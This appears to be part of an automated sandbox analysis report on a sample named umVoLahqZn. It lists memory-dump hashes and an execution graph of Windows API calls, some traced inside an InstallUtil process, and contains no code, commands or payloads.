                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: 52b5901219d7ac04840fc6974736f96562afae7595c692e468f6b4976358ab4f
                                • Instruction ID: 553755c1151cc4a2b468c98773afb16c3e5a9dac6af3afd631300274a3a3a8d4
                                • Opcode Fuzzy Hash: 52b5901219d7ac04840fc6974736f96562afae7595c692e468f6b4976358ab4f
                                • Instruction Fuzzy Hash: 257112B4D1221ACFCB14CFA9C5849AEFBB2FF49310F14951AD415AB354C730A982CF95
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: 09bb186c1d44aeb75a5f000a503ea64660764853bcb4738c7c0735e587bf1ca9
                                • Instruction ID: 6be784327c8746c1c3f5fcf7682348258f5b1cf80d100e2ffa66711f0c90d05a
                                • Opcode Fuzzy Hash: 09bb186c1d44aeb75a5f000a503ea64660764853bcb4738c7c0735e587bf1ca9
                                • Instruction Fuzzy Hash: 206123B4E1621A8FCB14CFA9C4859EEFBB2FF89310F14951AD415A7355C330AA82DF94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2711823731.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_13f0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065aa836369a2de2b3ed8e4726fa03113092cfa35e52ae85c86f0e37c53b1bf0
                                • Instruction ID: 7f8c7e82027c8e8824ca557a940068d2f393a8ff8a875ef93821391f254de22e
                                • Opcode Fuzzy Hash: 065aa836369a2de2b3ed8e4726fa03113092cfa35e52ae85c86f0e37c53b1bf0
                                • Instruction Fuzzy Hash: 94D1BE317017048FDB29EB79C554BAEBBFBAF89604F14446DE64ADB2A1CB34E802C751
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727211850.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6520000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cc7bee57b0d96a6afc0af466ccd2a951205d7485304a5e0bd6118a24c3ee1cf
                                • Instruction ID: ede87a00076c5bb247fc6e691aa36130e79e180a6c5102e53b45dfacb8c5064a
                                • Opcode Fuzzy Hash: 8cc7bee57b0d96a6afc0af466ccd2a951205d7485304a5e0bd6118a24c3ee1cf
                                • Instruction Fuzzy Hash: 26A1A070B002555FDB98ABB9886477F7AABBFC8710F14856D9009E73A8CE389C03C791
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e4c5ed0608620d7e5b4c6e15df20e11d1ca1caaf291b54ae81071a9cf36ca73
                                • Instruction ID: 60e45d00f230092e4bf2e68eea9f91be9793585f95a74a6b785bbb2c1ee9d3a9
                                • Opcode Fuzzy Hash: 0e4c5ed0608620d7e5b4c6e15df20e11d1ca1caaf291b54ae81071a9cf36ca73
                                • Instruction Fuzzy Hash: 9DE1163581065A8ACB11EF64D990A9DB7B5FF95300F20979AD4097B220EB70AEC9CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90e798a9da4876c874c9e9a6ef338ca8714c28052087639755ffa7d4c26538c1
                                • Instruction ID: 9fe1ac4b1a930e59bb1210f8862ec39b1ccc873a6232f957588e14771d728e46
                                • Opcode Fuzzy Hash: 90e798a9da4876c874c9e9a6ef338ca8714c28052087639755ffa7d4c26538c1
                                • Instruction Fuzzy Hash: BEB128B0E16229DBDF44CFA5D9445EDFBB2BB89300F10A429C409BB354D7349906DF18
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3aa0f298223eea1f004c1c27d24c2453d99e7023efc3ef86b20cb2769f73ea3f
                                • Instruction ID: 83f357b02753066916c73f9ad68ce09b3aa941db2707f57d3d2eec82c1ed854c
                                • Opcode Fuzzy Hash: 3aa0f298223eea1f004c1c27d24c2453d99e7023efc3ef86b20cb2769f73ea3f
                                • Instruction Fuzzy Hash: 57D1F735C1065A8ACB11EF65D990A9DF7B5FF95300F20D79AD4097B220EB70AEC9CB81
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 930bac683a11fdf5200d34d94999d67fc1415e63c171c20e3a1b6a0caba6173d
                                • Instruction ID: d5ff60f5482525b8d009700aaee582530cdc2f0f439a3756b0eee29c188a2fc9
                                • Opcode Fuzzy Hash: 930bac683a11fdf5200d34d94999d67fc1415e63c171c20e3a1b6a0caba6173d
                                • Instruction Fuzzy Hash: 52A12BB4E011298FCB14CF69D980AAEBBB6FF89301F24D169D809A7355D7309E42DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da54c5628b41aa6b132d0308ed728322cfe552081e1f3b5d3c40c1cbfa020be9
                                • Instruction ID: cb57809a4220ed072edcca498bdcb836be29c4b6f19dcf21b468316872bd5a8c
                                • Opcode Fuzzy Hash: da54c5628b41aa6b132d0308ed728322cfe552081e1f3b5d3c40c1cbfa020be9
                                • Instruction Fuzzy Hash: 84813674E162199FCB48CFA9D48099DFBF2FF89310F149466E414AB365D730AA42CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 45b0e40f9176797663160d368ad94dd7c7a1063bf2c8c9a6246adb983756fa18
                                • Instruction ID: 03b4660cb992da8519ca9777caec3d9f58dd7be4fa4b67eb2ab608eed7950111
                                • Opcode Fuzzy Hash: 45b0e40f9176797663160d368ad94dd7c7a1063bf2c8c9a6246adb983756fa18
                                • Instruction Fuzzy Hash: 0C814BB0E122298FCB14CFA9D980A9EFBB2FF89300F14D169D409A7355D730AA42DF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06ac116d73e6f974fb5891b1e546902f1bdf50e8efc6a02f22b08c9aa5f28128
                                • Instruction ID: 2844199f00f6475fa1d57034399d1a813c1da5130ecb68d953a5cbb9f77086b6
                                • Opcode Fuzzy Hash: 06ac116d73e6f974fb5891b1e546902f1bdf50e8efc6a02f22b08c9aa5f28128
                                • Instruction Fuzzy Hash: C77139B4E062298FCB14CF69C980A9EBBB2FF89304F14D1A9D409A7355D7349E42DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88a9479689dc166d5cb216afbe8fc49c7b437fa0cb3ed0bfef3f15bbf81edef2
                                • Instruction ID: e620efd2d77d448c0a57f6bd748467e83d60cf460186361b915f2dcc36cb70f3
                                • Opcode Fuzzy Hash: 88a9479689dc166d5cb216afbe8fc49c7b437fa0cb3ed0bfef3f15bbf81edef2
                                • Instruction Fuzzy Hash: D871E274E122199FCB48CFA9D58499EFBF2FB89310F149966E418AB364D730AA41CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fa6b4e07fae1c700d1a8a14630907af433425281d7c287d1a998e9e446e495a
                                • Instruction ID: 379e7ced99a2dc072af7501b7f2709f281d478dc2dca8f4cf2328aeb34727f2f
                                • Opcode Fuzzy Hash: 2fa6b4e07fae1c700d1a8a14630907af433425281d7c287d1a998e9e446e495a
                                • Instruction Fuzzy Hash: 215161B0E121298BDB14CF5AD9805AEFBF2FF89301F14D1A9D409A7245D7305E42DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9442585e2acfd9b98a1732b1ccb5a59981d1601cdc21285b58916212c2daf2dc
                                • Instruction ID: bd2c6fc8f7128c984bf747edc50e438cae401a7c5a44cbfdc50723fae2c6d483
                                • Opcode Fuzzy Hash: 9442585e2acfd9b98a1732b1ccb5a59981d1601cdc21285b58916212c2daf2dc
                                • Instruction Fuzzy Hash: 5F516FB0E121258BDB14CF69DA805AEFBF2FF89300F24D1AAD415A7255D7309A42DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 73402bf2bcbb7e6617f276f3c2ffad1fcaf9b156966bd5801bb56c6cb24cdc48
                                • Instruction ID: e89c9b5de50255c7822f2f0f07270b89de60a27a2f1804021283c2eca4f4d5bf
                                • Opcode Fuzzy Hash: 73402bf2bcbb7e6617f276f3c2ffad1fcaf9b156966bd5801bb56c6cb24cdc48
                                • Instruction Fuzzy Hash: 2C515AB1E116288BDB58CF6B8D4469EFBF7BFC9300F14C1BA950CA6254DB341A858F11
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4ec750f757adba44922cf119bc2d16872aa11ec7fee02df87287542756325b3
                                • Instruction ID: 2ed518e74bc45ba29f9b752b012e35bdaf2c02446fbd2aa0d96c735cb2a2d447
                                • Opcode Fuzzy Hash: b4ec750f757adba44922cf119bc2d16872aa11ec7fee02df87287542756325b3
                                • Instruction Fuzzy Hash: 24412AB1E116198BEB68CF6B8D4479EFAF7BFC8300F14C1BA950CA6264DB3419858F11
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2dbb616175ba4297b842c2dbd82a1bac20a51a9e4b11047bacf175768898474
                                • Instruction ID: 903b4ff3fd74572772b49de6207a79c5d0669e2d81ec1833fb7fabdf294b2109
                                • Opcode Fuzzy Hash: f2dbb616175ba4297b842c2dbd82a1bac20a51a9e4b11047bacf175768898474
                                • Instruction Fuzzy Hash: 614118B0E0521A9FCB04CFAAC9405EEFBF2EF89310F24D16AC405A7214D7309A52DBA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 519f92d3c908bd713cb74284416c7ad21b2803176d148f6a277f3839d9ae3033
                                • Instruction ID: 962f76a914c83cea793425416303c5291ac5df8ecb51c17dce5e3c3fca9fb5c1
                                • Opcode Fuzzy Hash: 519f92d3c908bd713cb74284416c7ad21b2803176d148f6a277f3839d9ae3033
                                • Instruction Fuzzy Hash: 2E41D4B0E0121A9BCB04CFAAC5405EEFBF2BF89300F24D569C405B7214D7349A429F95
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a60a9dd13d52a3ef626fef700974a4fe2783aff26d99f100fea5572082b2eb9
                                • Instruction ID: f0779dd0aa22c464e966564ea555c09914c6d47c994b66da3405d95897ea3f4d
                                • Opcode Fuzzy Hash: 5a60a9dd13d52a3ef626fef700974a4fe2783aff26d99f100fea5572082b2eb9
                                • Instruction Fuzzy Hash: 2611DDB1E156188FEB5DCF6B98446DEFBF3AFC9200F04C07AD908A6268DB3406568F51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: \;]q$\;]q$\;]q$\;]q
                                • API String ID: 0-2351511683
                                • Opcode ID: 13cbc96dbc699f0ebda0c4d39ca69d6e66f39929881ef4e6c19abbd5dfc98b9a
                                • Instruction ID: 3ded36ac614700942aaad76a547b8c91961eecbdf9c1bb9db54208d80af978cd
                                • Opcode Fuzzy Hash: 13cbc96dbc699f0ebda0c4d39ca69d6e66f39929881ef4e6c19abbd5dfc98b9a
                                • Instruction Fuzzy Hash: B00171B2B401198F97688E2DC498A3977EAFFCC6607254D6AE501CF371DA31DC41C790

                                Execution Graph

                                Execution Coverage:10.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:259
                                Total number of Limit Nodes:41
                                execution_graph 40116 190ae40 DuplicateHandle 40117 190aed6 40116->40117 39827 6c31080 39828 6c310c2 39827->39828 39830 6c310c9 39827->39830 39829 6c3111a CallWindowProcW 39828->39829 39828->39830 39829->39830 39831 190c6d8 39832 190c6dd 39831->39832 39833 190c6fb 39832->39833 39836 190cb18 39832->39836 39841 190cb08 39832->39841 39837 190cb2f 39836->39837 39838 190cbe0 39837->39838 39846 190d191 39837->39846 39852 190d1a0 39837->39852 39838->39832 39842 190cb2f 39841->39842 39843 190cbe0 39842->39843 39844 190d1a0 GetModuleHandleW 39842->39844 39845 190d191 GetModuleHandleW 39842->39845 39843->39832 39844->39842 39845->39842 39847 190d1b8 39846->39847 39848 190daa6 39847->39848 39858 6af1fd3 39847->39858 39865 6af1f30 39847->39865 39872 6af1f21 39847->39872 39848->39837 39853 190d1b8 39852->39853 39854 190daa6 39853->39854 39855 6af1fd3 GetModuleHandleW 39853->39855 39856 6af1f21 GetModuleHandleW 39853->39856 39857 6af1f30 GetModuleHandleW 39853->39857 39854->39837 39855->39853 39856->39853 39857->39853 39860 6af1fa8 39858->39860 39859 6af1fe9 39860->39859 39879 6af2f28 39860->39879 39887 6af2ed2 39860->39887 39895 6af2dd9 39860->39895 39903 6af2de8 39860->39903 39867 6af1f4d 39865->39867 39866 6af1fe9 39867->39866 39868 6af2f28 GetModuleHandleW 39867->39868 39869 6af2de8 GetModuleHandleW 39867->39869 39870 6af2dd9 GetModuleHandleW 39867->39870 39871 6af2ed2 GetModuleHandleW 39867->39871 39868->39867 39869->39867 39870->39867 39871->39867 39874 6af1f4d 39872->39874 39873 6af1fe9 39874->39873 39875 6af2f28 GetModuleHandleW 39874->39875 39876 6af2de8 GetModuleHandleW 39874->39876 39877 6af2dd9 GetModuleHandleW 39874->39877 39878 6af2ed2 GetModuleHandleW 39874->39878 39875->39874 39876->39874 39877->39874 39878->39874 39880 6af2f2f 39879->39880 39882 6af2e83 39879->39882 39880->39860 39881 6af2ed2 GetModuleHandleW 39881->39882 39882->39879 39882->39881 39911 6af35a9 39882->39911 39916 6af3270 39882->39916 39921 6af3388 39882->39921 39926 6af3269 39882->39926 39888 6af2e83 39887->39888 39888->39887 39889 6af2f2f 39888->39889 39890 6af2ed2 GetModuleHandleW 39888->39890 39891 6af35a9 GetModuleHandleW 39888->39891 39892 6af3269 GetModuleHandleW 39888->39892 39893 6af3388 GetModuleHandleW 39888->39893 39894 6af3270 GetModuleHandleW 39888->39894 39889->39860 39890->39887 39891->39888 39892->39888 39893->39888 39894->39888 39896 6af2de8 39895->39896 39897 6af2ed2 GetModuleHandleW 39896->39897 39898 6af2f2f 39896->39898 39899 6af35a9 GetModuleHandleW 39896->39899 39900 6af3269 GetModuleHandleW 39896->39900 39901 6af3388 GetModuleHandleW 39896->39901 39902 6af3270 GetModuleHandleW 39896->39902 39897->39896 39898->39860 39899->39896 39900->39896 39901->39896 39902->39896 39905 6af2e02 39903->39905 39904 6af2ed2 GetModuleHandleW 39904->39905 39905->39904 39906 6af2f2f 39905->39906 39907 6af35a9 GetModuleHandleW 39905->39907 39908 6af3269 GetModuleHandleW 39905->39908 39909 6af3388 GetModuleHandleW 39905->39909 39910 6af3270 GetModuleHandleW 39905->39910 39906->39860 39907->39905 39908->39905 39909->39905 39910->39905 39913 6af3291 39911->39913 39912 6af35d8 39912->39882 39913->39912 39931 6af6cc2 39913->39931 39939 6af6cd0 39913->39939 39918 6af3291 39916->39918 39917 6af35d8 39917->39882 39918->39917 39919 6af6cc2 GetModuleHandleW 39918->39919 39920 6af6cd0 GetModuleHandleW 39918->39920 39919->39918 39920->39918 39923 6af3291 39921->39923 39922 6af35d8 39922->39882 39923->39922 39924 6af6cc2 GetModuleHandleW 39923->39924 39925 6af6cd0 GetModuleHandleW 39923->39925 39924->39923 39925->39923 39928 6af326e 39926->39928 39927 6af35d8 39927->39882 39928->39927 39929 6af6cc2 GetModuleHandleW 39928->39929 39930 6af6cd0 GetModuleHandleW 39928->39930 39929->39928 39930->39928 39932 6af6c5f 39931->39932 39935 6af6ccf 39931->39935 39944 6af593c 39932->39944 39934 6af6c84 39934->39913 39936 6af6d7d 39935->39936 39948 6af90c8 39935->39948 39954 6af90b7 39935->39954 39936->39913 39940 6af6ced 39939->39940 39941 6af6d7d 39940->39941 39942 6af90c8 GetModuleHandleW 39940->39942 39943 6af90b7 GetModuleHandleW 39940->39943 39941->39913 39942->39941 39943->39941 39945 6af6bc8 GetModuleHandleW 39944->39945 39947 6af6c3d 39945->39947 39947->39934 39950 6af90ee 39948->39950 39949 6af954b 39949->39936 39950->39949 39951 6af85f0 GetModuleHandleW 39950->39951 39952 6af90c8 GetModuleHandleW 39950->39952 39953 6af90b7 GetModuleHandleW 39950->39953 39951->39950 39952->39950 39953->39950 39955 6af9057 39954->39955 39958 6af90c7 39954->39958 39955->39955 39956 6af954b 39956->39936 39957 6af85f0 GetModuleHandleW 39957->39958 39958->39956 39958->39957 39959 6af90c8 GetModuleHandleW 39958->39959 39960 6af90b7 GetModuleHandleW 39958->39960 39959->39958 39960->39958 39961 190b458 39962 190b486 39961->39962 39965 190a994 39962->39965 39964 190b4a6 39964->39964 39966 190a99f 39965->39966 39967 190bbcc 39966->39967 39968 190bc27 39966->39968 39972 190e920 39966->39972 39967->39968 39977 6c337d2 39967->39977 39981 6c337d0 39967->39981 39968->39964 39974 190e941 39972->39974 39973 190e965 39973->39967 39974->39973 39985 190ead0 39974->39985 39989 190eac1 39974->39989 39979 6c33835 39977->39979 39978 6c33c98 WaitMessage 39978->39979 39979->39978 39980 6c33882 39979->39980 39980->39968 39982 6c33835 39981->39982 39983 6c33c98 WaitMessage 39982->39983 39984 6c33882 39982->39984 39983->39982 39984->39968 39986 190eadd 39985->39986 39987 190eb16 39986->39987 39993 190d110 39986->39993 39987->39973 39990 190eaca 39989->39990 39991 190eb16 39990->39991 39992 190d110 3 API calls 39990->39992 39991->39973 39992->39991 39994 190d11b 39993->39994 39996 190eb88 39994->39996 39997 190d144 39994->39997 39996->39996 39998 190d14f 39997->39998 40002 6af66f8 39998->40002 40011 6af6710 39998->40011 39999 190f031 39999->39996 40004 6af6841 40002->40004 40005 6af6741 40002->40005 40003 6af674d 40003->39999 40004->39999 40005->40003 40020 6af6979 40005->40020 40025 6af6988 40005->40025 40006 6af678d 40006->40004 40029 6af7f20 40006->40029 40040 6af7f10 40006->40040 40013 6af6841 40011->40013 40014 6af6741 40011->40014 40012 6af674d 40012->39999 40013->39999 40014->40012 40018 6af6979 3 API calls 40014->40018 40019 6af6988 3 API calls 40014->40019 40015 6af678d 40015->40013 40016 6af7f20 GetModuleHandleW 40015->40016 40017 6af7f10 GetModuleHandleW 40015->40017 40016->40013 40017->40013 40018->40015 40019->40015 40021 6af6988 40020->40021 40051 6af69c8 40021->40051 40061 6af69d8 40021->40061 40022 6af6992 40022->40006 40027 6af69c8 2 API calls 40025->40027 40028 6af69d8 2 API calls 40025->40028 40026 6af6992 40026->40006 40027->40026 40028->40026 40030 6af7f4b 40029->40030 40074 6af5a0c 40030->40074 40033 6af7fce 40034 6af593c GetModuleHandleW 40033->40034 40035 6af7ffa 40033->40035 40034->40035 40036 6af5a0c GetModuleHandleW 40036->40033 40041 6af7f20 40040->40041 40042 6af5a0c GetModuleHandleW 40041->40042 40043 6af7fb2 40042->40043 40047 6af5a0c GetModuleHandleW 40043->40047 40048 6af8472 GetModuleHandleW 40043->40048 40049 6af8480 GetModuleHandleW 40043->40049 40050 6af83d0 GetModuleHandleW 40043->40050 40044 6af7fce 40045 6af593c GetModuleHandleW 40044->40045 40046 6af7ffa 40044->40046 40045->40046 40047->40044 40048->40044 40049->40044 40050->40044 40052 6af69d2 40051->40052 40053 6af6a0c 40051->40053 40052->40053 40054 6af593c GetModuleHandleW 40052->40054 40053->40022 40055 6af69f4 40054->40055 40055->40053 40059 6af6cc2 GetModuleHandleW 40055->40059 40071 6af6c62 40055->40071 40056 6af6a04 40056->40053 40057 6af6c10 GetModuleHandleW 40056->40057 40058 6af6c3d 40057->40058 40058->40022 40059->40056 40062 6af69e9 40061->40062 40065 6af6a0c 40061->40065 40063 6af593c GetModuleHandleW 40062->40063 40064 6af69f4 40063->40064 40064->40065 40069 6af6cc2 GetModuleHandleW 40064->40069 40070 6af6c62 GetModuleHandleW 40064->40070 40065->40022 40066 6af6a04 40066->40065 40067 6af6c10 GetModuleHandleW 40066->40067 40068 6af6c3d 40067->40068 40068->40022 40069->40066 40070->40066 40072 6af593c GetModuleHandleW 40071->40072 40073 6af6c84 40072->40073 40073->40056 40075 6af5a17 40074->40075 40076 6af7fb2 40075->40076 40094 6af85e0 40075->40094 40105 6af85f0 40075->40105 40076->40036 40079 6af8472 40076->40079 40084 6af83d0 40076->40084 40089 6af8480 40076->40089 40080 6af83cf 40079->40080 40081 6af8368 40080->40081 40082 6af85e0 GetModuleHandleW 40080->40082 40083 6af85f0 GetModuleHandleW 40080->40083 40081->40033 40082->40081 40083->40081 40085 6af83cf 40084->40085 40086 6af8360 40084->40086 40085->40086 40087 6af85e0 GetModuleHandleW 40085->40087 40088 6af85f0 GetModuleHandleW 40085->40088 40086->40033 40087->40086 40088->40086 40090 6af84ad 40089->40090 40091 6af852e 40090->40091 40092 6af85e0 GetModuleHandleW 40090->40092 40093 6af85f0 GetModuleHandleW 40090->40093 40091->40091 40092->40091 40093->40091 40095 6af8570 40094->40095 40096 6af85e3 40094->40096 40095->40076 40096->40095 40097 6af593c GetModuleHandleW 40096->40097 40098 6af86e9 40096->40098 40097->40098 40099 6af593c GetModuleHandleW 40098->40099 40104 6af88a5 40098->40104 40100 6af882b 40099->40100 40101 6af593c GetModuleHandleW 40100->40101 40100->40104 40102 6af8879 40101->40102 40103 6af593c GetModuleHandleW 40102->40103 40102->40104 40103->40104 40104->40076 40106 6af8601 40105->40106 40107 6af8606 40106->40107 40108 6af593c GetModuleHandleW 40106->40108 40109 6af86e9 40106->40109 40107->40076 40108->40109 40110 6af593c GetModuleHandleW 40109->40110 40115 6af88a5 40109->40115 40111 6af882b 40110->40111 40112 6af593c GetModuleHandleW 40111->40112 40111->40115 40113 6af8879 40112->40113 40114 6af593c GetModuleHandleW 40113->40114 40113->40115 40114->40115 40115->40076 40118 6c33238 40119 6c33260 40118->40119 40122 6c3328c 40118->40122 40120 6c33269 40119->40120 40123 6c32664 40119->40123 40125 6c3266f 40123->40125 40124 6c33583 40124->40122 40125->40124 40127 6c32680 40125->40127 40128 6c335b8 OleInitialize 40127->40128 40129 6c3361c 40128->40129 40129->40124 40130 6af8f10 40131 6af8f78 CreateWindowExW 40130->40131 40133 6af9034 40131->40133
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 463069d5e3590f5cebd51f2cd3507cac862ef7fe0b9355d2f74f26463af1c55e
                                • Instruction ID: 61dc6a10af2ee37facc5f0000d6b0b0de719a00ca947ed4d130e28bb1a7437cf
                                • Opcode Fuzzy Hash: 463069d5e3590f5cebd51f2cd3507cac862ef7fe0b9355d2f74f26463af1c55e
                                • Instruction Fuzzy Hash: BAF16B30E002A9CFDB54DFA9D844BADBBF1BF48304F158559E809AB365DB74E945CB80
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 3fa02d0e0e683c96fc933f2a0c7b3fba3d17bcaaa84cd30122765c9ec7af042b
                                • Instruction ID: d595483692ad5a948c623e706a58bba342c644cfcfc6e787a6c34e9784e89f5f
                                • Opcode Fuzzy Hash: 3fa02d0e0e683c96fc933f2a0c7b3fba3d17bcaaa84cd30122765c9ec7af042b
                                • Instruction Fuzzy Hash: B7711470A10B058FD764EF69D44079ABBF5FF88304F00892DE58ADBA50DB75E845CB91
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF9022
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 34a02552e36e6c594c6ab77b483147c6d8360f54e50c7a7b12b45aab847795e0
                                • Instruction ID: 32015f438d63b79222dcc9f8e2dc0acbe734db9bc25118c04904cfa285560795
                                • Opcode Fuzzy Hash: 34a02552e36e6c594c6ab77b483147c6d8360f54e50c7a7b12b45aab847795e0
                                • Instruction Fuzzy Hash: 2651C0B1D10349DFDB14DF99C884ADEBBB6FF48300F24822AE518AB210D7759985CF91
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF9022
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
